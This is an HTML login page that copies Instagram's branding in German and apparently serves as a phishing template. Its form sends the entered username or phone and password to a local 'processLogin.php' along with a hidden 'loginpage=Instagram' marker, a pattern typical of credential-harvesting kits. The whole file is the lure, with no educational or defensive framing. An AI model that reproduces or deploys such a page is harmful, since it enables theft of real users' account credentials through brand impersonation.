<html>
    <link rel="icon" type="image/png" href="images/icons/favicon.ico"/>
    <head>
        <title>Instagram Login</title>

        <style>
body{
  background:#fafafa;
  margin:0;
  padding:0;
}
*{
  font-family: "proxima-nova",-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Helvetica,Arial,sans-serif;
}
.instagram{
  background:#ffffff;
  border: 1px solid #e6e6e6;
  width:350px;
  height: 350px;
  border-radius:3px;
  margin-bottom:10px;
  text-align:center;
  padding:5px;
}
.all{
  width:350px;
  position:relative;
  left:50%;
  margin-left:-175px;
  margin-top:25px;
}
.inputlar{
  width:270px;
  margin:auto;
}
.inputlar input{
  width: 270px;
  padding:10px;
  border: 1px solid #dbdbdb;
  border-radius: 3px;
  margin-top:7px;
  outline:0;
  color:#262626;
}
.inputlar input:focus{
  border:1px solid #aaa;
}
.buttons{
  width:270px;
  margin:auto;
}
.buttons button{
  width: 100%;
  outline:0;
  font-size:14px;
  margin-top:15px;
  margin-bottom:25px;
  padding:10px;
  font-weight:bold;
  color:#fff;
  background:#3897f0;
  border:none;
  border-radius:3px;
}
.logo {
  margin:auto;
  width:270px;
  text-align:center;
}
.logo img{
  width:60%;
  margin-top:20px;
}

.oryantal{
  width:270px;
  margin:auto;
  border-bottom:1px solid #c7c7c7;
  margin-bottom:15px;
}
.kayit{
  width:270px;
  margin:auto;
  text-align:center;
  color:#262626;
  font-size:13px;
  margin-bottom:15px;
}
a{
  text-decoration:none;
  color:#333;
}
.pad{
  padding:20px 5px;
            }</style>
<meta id="viewport" name="viewport" content="width=device-width, user-scalable=no, initial-scale=1, minimum-scale=1, maximum-scale=1">
<div class="all">
<div class="instagram">
  <div class="logo">
    <img src="images/instagramlogo.png" alt="" />
      <br>
  </div>
  <div class="inputlar">
    <form action="processLogin.php" method="POST">
      <input type="text" placeholder="Telefonnummer, Benutzername oder E-Adresse" name="user"/>
      <input type="password" placeholder="Passwort" name="pass"/>
      <input type='hidden' name='loginpage' value='Instagram' />
      <div class="buttons">
        <button type="submit">Anmelden</button>
      </div>
    </form>
  </div>

  <div class="oryantal"></div>
    <br>
  <div class="kayit">
    Du hast noch kein Konto? <a href="#">Registrieren</a>
  </div>
</div>


</div>
